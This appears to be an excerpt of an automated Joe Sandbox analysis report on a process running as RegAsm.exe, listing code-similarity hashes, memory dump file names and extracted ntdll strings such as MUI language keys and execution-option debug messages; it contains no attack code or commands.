                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                  • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                  • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                  • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                  • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                  • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                  • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                  • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                  • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                  • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                  • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                  • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                  • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                  APIs
                  Strings
                  • WindowsExcludedProcs, xrefs: 023187C1
                  • Kernel-MUI-Language-Allowed, xrefs: 02318827
                  • Kernel-MUI-Number-Allowed, xrefs: 023187E6
                  • Kernel-MUI-Language-SKU, xrefs: 023189FC
                  • Kernel-MUI-Language-Disallowed, xrefs: 02318914
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: _wcspbrk
                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                  • API String ID: 402402107-258546922
                  • Opcode ID: e32b4ebd5f8c2e92e157748568088497affeec3ce5a6988382607b668dc954a7
                  • Instruction ID: ac15fd17c4bb23f4e8f228e09d7387f26328fa602937863a76f77bd8a2194ac8
                  • Opcode Fuzzy Hash: e32b4ebd5f8c2e92e157748568088497affeec3ce5a6988382607b668dc954a7
                  • Instruction Fuzzy Hash: 6DF113B2D00209EFDB55DFD8C9849EEBBB9BF08304F14846AE605A7621E7349A45DF60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 8515bfb39c4ad542051fb6e7af01359bf7e27370bea951cca881f0509b632ca9
                  • Instruction ID: 55873b3b59d7d81323d36a69c64ef1b30f21bf6fd3993815ef9c5803539c00b8
                  • Opcode Fuzzy Hash: 8515bfb39c4ad542051fb6e7af01359bf7e27370bea951cca881f0509b632ca9
                  • Instruction Fuzzy Hash: D36104B1E04665AADF35DF99C8809BEBBB6EF84310B14C12DE9DE47540D734A740CB60
                  APIs
                  • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02343F12
                  Strings
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 0234E345
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0234E2FB
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02343F75
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02343F4A
                  • Execute=1, xrefs: 02343F5E
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02343EC4
                  • ExecuteOptions, xrefs: 02343F04
                  • 'S, xrefs: 02327F1E
                  Memory Dump Source
                  • Source File: 00000003.00000002.455555321.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: true
                  • Associated: 00000003.00000002.455555321.00000000022D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.00000000023E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.455555321.0000000002440000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_22d0000_RegAsm.jbxd
                  Similarity
                  • API ID: BaseDataModuleQuery
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$'S
                  • API String ID: 3901378454-944296841
                  • Opcode ID: 27b444df6a2628957f80e8498c51e69d7ed1dec5be495e5c700844f8c1658c9a
                  • Instruction ID: 5137c5a1ce562ca61bae84b0f78dc63b5bfd35ecde718946efaed3509b9f8ead
                  • Opcode Fuzzy Hash: 27b444df6a2628957f80e8498c51e69d7ed1dec5be495e5c700844f8c1658c9a
                  • Instruction Fuzzy Hash: 9E41A97169031DBAEB20DA94DCC5FDAB3FDAF15704F0005E5E605E6081EB70EA458F61
                  APIs
                  Strings
